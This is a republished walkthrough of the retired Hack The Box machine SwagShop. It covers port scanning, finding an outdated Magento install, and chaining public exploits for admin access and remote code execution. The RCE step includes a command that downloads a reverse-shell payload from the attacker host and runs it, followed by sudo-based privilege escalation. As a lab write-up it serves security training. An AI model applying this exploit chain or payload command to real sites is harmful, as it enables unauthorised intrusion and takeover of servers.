SwagShop: Hack The Box Walkthrough
source link: https://www.tuicool.com/articles/MVvmuiI
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
This post documents the complete walkthrough of SwagShop, a retired vulnerable VM created by ch4p , and hosted at Hack The Box . If you are uncomfortable with spoilers, please stop reading now.
Background
SwagShop is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.140 --rate=700 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-05-14 01:30:31 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.140 Discovered open port 80/tcp on 10.10.10.140
Nothing unusual. Let’s do one better with nmap
scanning the discovered ports to establish the services.
# nmap -n -v -Pn -p22,80 -A --reason -oN nmap.txt 10.10.10.140 ... PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 88733EE53676A47FC354A61C32516E82 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Error 503: Service Unavailable
The http
service appears to be running an old version of Magento Community Edition (2014? Hello, it’s 2019!). Sometimes it pays to look at the copyright notice down at the footer. Here’s how it looks like.
Scroll down.
Magento Community Edition 1.7.0.2
How do I know the version? Check out the release notes basically. The directory structure is also found in a GitHub repository mirror for older versions.
Magento Shoplift Vulnerability
This particular version is susceptible to the Magento Shoplift vulnerability discovered by Checkpoint in 2015.
Well, there’s a readily available exploit, EDB-ID 37977 for it. Running this exploit will grant access to the Admin Panel with credentials ( forme:forme
).
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
This next exploit, EDB-ID 37811 will allow us to execute remote commands. There are just two minor modifications to the exploit script.
We got the credentials from the previous exploit. The installation date can be obtained from http://10.10.10.140/app/etc/local.xml
as suggested.
One last thing we need to know is the URL to the Admin Panel, which is http://10.10.10.140/index.php/admin
. You can get a feel of the directory structure by navigating the site a bit, provided it doesn’t give you 503
s :laugh:
Low-Privilege Shell
I generate a reverse shell with msfvenom
, host it with Python’s SimpleHTTPServer, and also set up a nc
listener. We then execute the exploit like so.
# python rce.py http://10.10.10.140/index.php/admin "wget -O/tmp/rev http://10.10.14.11/rev; chmod +x /tmp/rev; /tmp/rev"
It’s customary to display /etc/passwd
.
The file user.txt
is in haris
’s home directory and it can be disappointingly read by all.
Privilege Escalation
Notice the .sudo_as_admin_successful
?
This means that haris
is able to sudo
to a certain extent.
There you go, classic escape to root
shell.
With that, getting root.txt
is a breeze.
Afterthought
What a neat idea to promote the SwagShop!
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK